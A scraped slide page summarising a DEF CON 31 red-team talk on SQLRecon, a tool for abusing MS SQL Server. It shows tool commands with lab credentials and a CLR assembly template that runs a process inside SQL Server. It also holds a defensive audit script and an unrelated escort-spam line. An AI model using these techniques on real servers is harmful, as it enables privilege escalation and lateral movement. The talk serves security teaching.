MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code ExtensionMySQL Day Roma - MySQL Shell and Visual Studio Code Extension
MySQL Day Roma - MySQL Shell and Visual Studio Code Extension
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 EditionEnter the Dragon -  SQL 2014 on Server Core PASS Summit 2014 Edition
Enter the Dragon - SQL 2014 on Server Core PASS Summit 2014 Edition
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginnersSQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
SQLSaturday#290_Kiev_WindowsAzureDatabaseForBeginners
 
SqlSa94
SqlSa94SqlSa94
SqlSa94
 
The Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET EcosystemThe Emergence of Choice in the .NET Ecosystem
The Emergence of Choice in the .NET Ecosystem
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 

Recently uploaded

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 

Recently uploaded (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

  • 10. How Did This Research Come About?
    Like most tooling … to solve a problem encountered on an engagement
    PowerShell is good, but C# is better when evading modern defensive controls
    Address the MS SQL Server C# post-exploitation tooling gap
    - Modernize the approach red teamers can take when facing MS SQL Server
    - Operational Security
    - Execution Guardrails
    - SQLRecon works with a diverse set of C2 frameworks
    - Fork & Run and In-Process compatible
  • 11-16. Command Line Usage
    SQLRecon is straightforward to use. There are only three required arguments:
    - An authentication type
    - The hostname or IP address for an MS SQL Server
    - A module
    Example: Enumerating databases on a remote MS SQL Server
      SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
    Shortform command line arguments are also supported and are case-insensitive:
      SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
  • 17. Authentication Providers
    SQLRecon supports 5 different MS SQL Server authentication providers:
    Authentication Type | Example
    WinToken            | SQLRecon.exe /a:WinToken /h:host /m:module
    WinDomain           | SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
    Local               | SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
    AzureAD             | SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
    AzureLocal          | SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
  • 18. Module Overview
    SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are the modules that can facilitate privilege escalation, lateral movement, or command execution (columns: Privilege Escalation / Lateral Movement / Command Execution):
    - xp_cmdshell: ✅ / ✅ / ✅
    - OLE Automation Procedures: ✅ / ✅ / ✅
    - CLR Integration for Custom .NET Assemblies: ✅ / ✅ / ✅
    - Agent Jobs: ✅ / ✅ / ✅
    - Cleartext ADSI Credential Retrieval: ✅ (one of the three columns)
    - MECM / SCCM User Management: ✅ (one of the three columns)
    - Cleartext MECM / SCCM Credential Retrieval: ✅ (one of the three columns)
  • 20-21. Get Involved!
    WiFi SSID: SQLRecon-Lab
    Password: DefconIsCancelled!
    Rules
    - Don’t DoS the lab. We’re all here to learn together.
    - Don’t attack each other. We’re all here to learn together.
    - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
    Lab (kawalabs.local)
    - DC01 172.16.10.100
    - SQL01 172.16.10.101
    - SQL02 172.16.10.102
    - SQL03 172.16.10.104
    - MECM01 172.16.10.103
    - ecom01.database.windows.net
    Test Connection String
      SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
  • 22. Demo 1 - Evaluating the current user’s permissions
  • 24. Demo 2 - Locating MS SQL Servers in AD via SPNs
  • 26. Demo 3 - Enumerating Azure MS SQL Server Database
  • 28. Demo 4 - Unprivileged UNC Path Injection
  • 30. Demo 5 - Operational Security and Execution Guardrails
  • 32-33. Demo 6 - Privilege Escalation: Abusing Impersonation
    BUILTIN\Users can impersonate sa!
  • 35-36. Demo 7 - Lateral Movement: Abusing Linked MS SQL Servers
    SQL02 has an MS SQL Server link to SQL03
  • 37-38. Demo 7 - Lateral Movement: Abusing Linked MS SQL Servers
    - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server
    - Assemblies are stored inside the SQL database and exposed as a stored procedure
    - You can then execute whatever is inside the custom assembly!
    Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
    Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410

        // sql.cs
        // Compile to a class library with:
        // C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs
        using System;
        using System.Data;
        using System.Data.SqlClient;
        using System.Data.SqlTypes;
        using Microsoft.SqlServer.Server;
        using System.Diagnostics;

        public partial class StoredProcedures
        {
            // Exposed as a CLR stored procedure once the assembly is imported into SQL Server
            [Microsoft.SqlServer.Server.SqlProcedure]
            public static void CustomFunctionName()
            {
                // Demo payload: start notepad.exe in the SQL Server service context
                Process proc = new Process();
                proc.StartInfo.FileName = @"C:\Windows\System32\notepad.exe";
                proc.Start();
            }
        }
  • 40-41. Demo 8 - Credential Abuse: ADSI Double-Link Boomerang
    SQL03 has an ADSI link to DC01
  • 43. Demo 9 - SCCM / MECM Enumeration
  • 48-49. Defensive Considerations
    Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance: github.com/xforcered/SQLRecon/wiki
    Top 3 MS SQL Server Security Controls
    - Follow the Microsoft SQL Server best practices!
    - Consider removing or restricting the BUILTIN\Users account and low privilege groups from authenticating against MS SQL Server instances
    - Evaluate impersonation and MS SQL Server links
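As an added defensive companion to the Demo 7 CLR template and the Defensive Considerations slide above, the T-SQL below is example audit code written for this page (it is not from the talk or from SQLRecon); it assumes a sysadmin connection and uses only documented SQL Server system catalog views.

```sql
-- Added audit script (not part of the talk or of SQLRecon): run as a
-- sysadmin with sqlcmd or SSMS to review the settings the Defensive
-- Considerations slide calls out. Only documented catalog views are used;
-- query 5 is per database, so run it inside each user database.

-- 1. Broad Windows groups that hold a server login (the BUILTIN\Users default).
SELECT name, is_disabled, create_date
FROM sys.server_principals
WHERE type_desc = 'WINDOWS_GROUP'
  AND (name = N'BUILTIN\Users' OR name LIKE N'%\Domain Users'
       OR name LIKE N'%\Authenticated Users');

-- 2. Server-level IMPERSONATE grants (Demo 6): a low privileged login that
--    may impersonate sa or another sysadmin is effectively sysadmin itself.
SELECT grantee.name AS grantee, target.name AS can_impersonate, sp.state_desc,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions sp
JOIN sys.server_principals grantee ON grantee.principal_id = sp.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = sp.major_id
WHERE sp.class_desc = 'SERVER_PRINCIPAL' AND sp.permission_name = 'IMPERSONATE';

-- 3. Linked servers and their login mappings (Demos 7 and 8). A mapping with
--    local_login '<all logins>' and a fixed remote_name lets every caller
--    piggyback on that remote account; provider ADSDSOObject is an ADSI link.
SELECT s.name, s.provider, s.data_source, ll.uses_self_credential, ll.remote_name,
       ISNULL(lp.name, '<all logins>') AS local_login
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 4. Command execution surfaces from the module table; value_in_use = 1
--    means the feature is on right now. 'clr strict security' should be 1.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'clr enabled', 'clr strict security');

-- 5. User-defined CLR assemblies in the current database. UNSAFE or
--    EXTERNAL_ACCESS ones can start processes like the Demo 7 template.
SELECT name, permission_set_desc, create_date, modify_date
FROM sys.assemblies
WHERE is_user_defined = 1;

-- 6. Agent job steps that run OS commands or PowerShell.
SELECT j.name AS job_name, j.enabled, s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell');
```

Rows returned by queries 1 to 3 are the findings the slide asks you to evaluate; an unexpected assembly in query 5 or a CmdExec step in query 6 is worth comparing against the change record for that instance.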
  • 50. Questions or Comments? Thank You
    @xforcered github.com/xforcered/SQLRecon IBM X-Force Red
    github.com/skahwah @sanjivkawa